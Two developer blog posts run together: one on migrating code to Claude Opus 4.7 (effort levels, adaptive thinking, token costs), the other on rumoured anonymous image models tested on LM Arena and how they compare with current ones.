budget_tokens is gone, so how do you tell Opus 4.7 to think harder? Through output_config.effort, which has five levels on Opus 4.7. Here is the full ladder.
| effort | availability | intended use |
|---|---|---|
| low | all models | snappy replies, tight budgets |
| medium | all models | general workloads |
| high | all models (default) | balanced reasoning |
| xhigh | Opus 4.7 only | deeper reasoning short of max |
| max | all models | maximum reasoning, maximum cost |
Here is the twist. Claude Code's default effort moved to xhigh on all plans today. No announcement, no release note in the UI — the models overview only mentions the level exists. Same commands you ran yesterday will feel slower today, and combined with the tokenizer inflation, monthly spend can jump visibly. If cost is a concern, set effort to high at the project level and reach for xhigh deliberately, not by default.
Claude Code also shipped a unified interface for multiple projects and a Microsoft Word beta integration in the same release. I am writing a book about Claude Code right now, tracked in Writing a Claude Code book with Claude Code, and the xhigh default has already earned a callout in the next draft.
Post not found or has been removed.
On the same day, Anthropic launched an in-house AI design tool for websites and presentations. The Information broke it on April 14 and Figma and Wix shares closed between 2 and 4 percent lower that session. This is the moment Opus 4.7 stops being a model bump and becomes part of a product stack expansion. If you have ever spent a weekend producing five landing page variants by hand, that work compresses to a single agent call on the new stack.
One more item worth a mention: Anthropic announced Claude Mythos Preview, an invitation-only model available through Project Glasswing for defensive cybersecurity research. The UK AI Safety Institute reported that Mythos "autonomously executed a 32-step network simulation typically requiring 20 human hours" at rates not previously benchmarked. Mythos is not Opus 4.7 — it is a separate model — but the two ship together as evidence that Anthropic's agent story is accelerating.
The order that let me ship the bump without burning a day. Find every call site that still uses thinking.type: "enabled" — ripgrep "enabled" under your thinking usage — and swap to "adaptive", removing budget_tokens. Where your UI surfaces reasoning, add display: "summarized" explicitly. Meter a representative sample of production prompts against the new tokenizer and multiply by your usage to project the invoice impact before traffic shifts. For Claude Code, set effort to high at the project level and only escalate to xhigh on tasks that clearly warrant deeper reasoning. Then flip the model ID.
The cheap alternatives are worth naming. You can stay on Opus 4.6, which still serves the old "enabled" shape as deprecated behavior — fine for a week or two while you prep. You can route some traffic to Sonnet 4.6 for cost-sensitive paths. You can opt into adaptive on Opus 4.6 first, so the thinking-shape migration happens independently of the model swap. What you cannot do is bump the model ID and hope no code noticed.
After running through this migration on three different projects today, my blunt read is that Opus 4.7 is better approached as an API redesign with a model upgrade attached, rather than a drop-in version increment. The reasoning quality on agentic coding is noticeably better — I can feel it in Claude Code's tool sequencing — and the 1M-context window with interleaved thinking by default is genuinely nice. But the invoice story is tighter than the announcement suggests, and the display default is a trap.
What did your budget_tokens code do when you bumped to 4-7 — silent behavior change or loud 400?
One character in a model ID can drag three breaking changes behind it.
Full Korean analysis on spoonai.me.
Sources
2026-04-16 23:00:06
I opened LM Arena on a Tuesday night to A/B two image models. The one on the left had no name — just packingtape-alpha. Three renders in, I knew what I was looking at.
LM Arena is the blind-comparison leaderboard for text-to-image models at arena.ai. "duct-tape" is the community nickname for three anonymous models — packingtape-alpha, maskingtape-alpha, gaffertape-alpha — that appeared there in early April 2026 and were pulled within hours. OpenAI has not confirmed ownership, but the community has settled on the inference that this is the next-generation OpenAI image model, widely rumored as GPT-Image 2.
I want to walk through why I think this matters for solo builders, what the community actually verified during the brief test window, what the alternatives look like right now, and what it changes in my own stack. Keep one thing in mind throughout: strong community inference is not the same as confirmation. I'll flag the line every time it matters.
My three active projects are a saju app, a trading bot, and a coffee-chat platform. Every one of them runs on a multi-tool image pipeline: generate a base render, import to Figma to fix the text, retouch skin or lighting in a second tool, export the thumbnail. Ten to thirty minutes per asset, per platform. The binding constraint has been text-in-image. Every current model garbles strings longer than a few words, which means every marketing asset has a mandatory edit step after generation.
That binding constraint is what duct-tape appears to dissolve. If the tests the community reproduced are anywhere near representative, the first step in that pipeline stops needing the second, third, and fourth steps. That is not a productivity improvement, that is a shape change. I started redesigning my asset workflow the week the tests dropped, before any launch, because the cost of waiting and being wrong is small and the cost of waiting and being right is that my competitors get there first.
Here is the clean version of what is confirmed. Three anonymous models with adhesive-tape codenames appeared on LM Arena. They were live for a fraction of a day. The community dubbed the family "duct-tape." Hundreds of blind A/B renders were captured and screenshotted before the models disappeared. There is no official statement from OpenAI.
Here is what is inference, strong but unofficial. The rendering fingerprint — a specific softness in specular highlights, a particular handling of sans-serif text — matches the gpt-image-1 and gpt-image-1.5 lineage. DALL-E retires on May 12, 2026, which forces OpenAI to have a replacement ready. Analyst estimates center on a May to June 2026 public launch. The working name "GPT-Image 2" is a rumor and may not be the final product name.
Three capability themes came out of the reproduced tests. Text rendering was the loudest. A fake OpenAI homepage prompt returned a nav bar, button labels, and body copy with correct spelling across roughly a dozen words. A League of Legends screenshot mock rendered KDA numbers, item names, and cooldown timers at pixel accuracy. World knowledge was the second. Prompts naming specific locations — a "Shibuya Scramble at 4 AM in the rain" test circulated widely — returned building layouts, chain logos, and lane counts that matched Street View. Photorealism was the third. Skin, eye highlights, and hair-end specular handling all improved noticeably versus gpt-image-1.5. Korean testers zeroed in on Hangul rendering, and @choi.openai on Threads captured the mood when he wrote that Nano Banana Pro had been out-muscled for the first time.
One weakness carried over unchanged. Duct-tape still fails the Rubik's Cube reflection test, the community benchmark for mirror-image physical correctness. Content filters also ran more aggressive than gpt-image-1.5, with refusals on prompts that previously passed. No public API, no pricing, no SDK.
Google's Nano Banana 2 has held the LM Arena text-to-image top spot since December 2025. gpt-image-1.5 is second. Midjourney v7 still wins on artistic ceiling and has about 21 million paid subscribers, but its text rendering has slipped behind gpt-image-1.5 over the past quarter. Here is the comparison I would actually use to decide what to touch in my stack today.
| Capability | duct-tape (rumored) | Nano Banana 2 | gpt-image-1.5 |
|---|---|---|---|
| In-image text | Near-perfect on ~12-word strings | Strong but inconsistent | 30–40% error on long strings |
| World knowledge / real places | Matches Street View on named scenes | Strong on Western cities | Generic, often invented |
| Photorealism | Visibly improved skin / eye / hair | Top-tier, slightly plastic | Good, AI tells remain |
| Hangul / non-English text | Reportedly excellent | Mixed | Unreliable |
| Public API availability | None | Yes | Yes |
| Pricing | Unknown | ~$0.04/image | $0.04–0.17/image |
If you are shipping product today, Nano Banana 2 plus gpt-image-1.5 in a fallback chain is the defensible choice. If your pipeline's bottleneck is in-image text, and you can afford to wait until mid-to-late May, the smart move is to design the duct-tape API integration now and leave a stubbed adapter in place.
The viral test that hit my feed was the fake OpenAI homepage prompt. A community tester wrote a prompt describing a landing page for a new OpenAI image model: center hero with "GPT Image 2" headline in sans-serif, subheadline in smaller weight, a horizontal nav with six labeled links, a primary CTA button, and footer text. The render came back with every label in the right position, spelled correctly, typographically consistent. The button had a hover shadow. The footer had a legal line that did not quite match a real one but was spelled cleanly. Nothing in that render would have failed a first glance from a designer.
The equivalent output from gpt-image-1.5 would have rendered maybe three of the six nav labels correctly, butchered the subheadline, and inserted a fake-looking OpenAI logo. Either output would still need to go through Figma for the actual build, but the duct-tape render would go through as a reference, not as something to fix. That is the hinge.
Three practical changes I am making now. First, I am writing my new asset pipeline with a single image-generation step and a lightweight review step instead of a multi-tool chain. The new shape assumes the model gets text right. If duct-tape or equivalent ships, the pipeline is already aligned. If it slips, my fallback keeps the multi-tool chain available for text-heavy assets only.
Second, I am putting a Korean small-business SaaS hypothesis back into my prototype queue. Hangul rendering has been the binding constraint on image-AI product adoption in that segment for years, and a duct-tape-class API opens it. I wrote about the saju app's visual language in my Three.js cosmic design post, and the same reasoning applies — when the visual tooling gets good enough to ship without hand-editing, new product surfaces open.
Third, I am not rewriting my trading bot's UI generation scripts. The bot renders strategy reports as images for a Telegram channel, and the current pipeline with gpt-image-1.5 plus a small Figma overlay is stable. I covered the bot's architecture in the trading bot 15 strategies writeup, and the image step is mid-priority compared to execution logic. A better image model does not change what needs to be true for that product to work.
A thought about the broader arc. Model releases used to be judged on whether they were "prettier." That axis is dead. What matters now is how many steps in your workflow disappear when the model ships. This is the same pattern I wrote about in prompting is programming — the useful question is no longer "is the output better" but "what does the output let me stop doing."
If duct-tape is really GPT-Image 2, what's the first thing in your workflow that becomes unnecessary?
An anonymous model appeared on the leaderboard and was gone by morning. Nothing is confirmed. Those few hours still reset the next month of my roadmap.
Read the Korean version on spoonai.me.
Sources: